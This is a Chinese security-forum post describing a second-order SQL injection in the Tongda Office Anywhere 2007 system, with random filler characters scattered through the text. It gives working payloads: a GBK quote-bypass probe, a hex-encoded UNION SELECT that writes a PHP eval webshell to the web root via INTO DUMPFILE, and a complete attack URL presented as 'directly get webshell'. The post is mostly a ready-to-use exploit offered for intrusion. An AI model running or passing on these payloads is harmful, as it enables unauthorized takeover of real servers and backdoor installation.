找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2508|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
目前测试通达OA2007版本' |1 W) J4 [5 L& |" i

9 n# I5 S. W5 A' d6 h) m" S. U   U5 x/ {) d( t, C+ M5 s8 {
Office Anywhere 2007 网络智能办公系统! V# ?' n/ L; ~" E& ]

1 V0 r& ?2 a+ ~, e5 z; Ohttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..9 f! u: d) V  u9 l. r
0 l! m# g; ^. s2 X% T

, |# b" q8 y9 ?  }这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的3 z& u8 u+ s- }. Q' ?! n6 Z
' |0 T7 ~, B6 o7 z/ c" w
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
6 c) x7 c8 G  H& L" W其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了* u5 j7 b) B0 R: t, s' _9 a  w
* {( N/ M/ i' h! N: e2 U% O
这个时候我们是不是可以组合起来使用哪?* R. D% a1 t9 _+ |/ o) b0 ]* x

- R- f$ e& K& p第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
4 O& f8 K" M* K& s; E( sunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10  Z$ [- D9 M* [" g! \5 \' o* z
5 S' e6 A  g0 ]* D/ |5 ^* A
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
8 N7 r( \/ V* q" N2 u
3 c: o; _4 H1 |$ [/ N! z$ k+ O8 m那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
. L% \1 E# t9 I- Z0 Q1 ^: Y7 R ; ?2 Y* ^7 N( G8 L
那么我们用字符串格式带入进行hex编码
! ~) m( B5 |, d / G! |# C* ]  B0 [% j9 Q( M' T
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
) R% l" N$ U! A9 i3 q( i # s" i; o# H: H! [+ j
测试ok,获取oa的webshell8 r1 x  D( t' F7 z% [% R- d

: @. Q+ s* g$ Z+ c4 B9 n9 ^! \. @ 5 b' h, i' Y9 P: X+ h
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
1 ]0 |8 x$ c! V直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表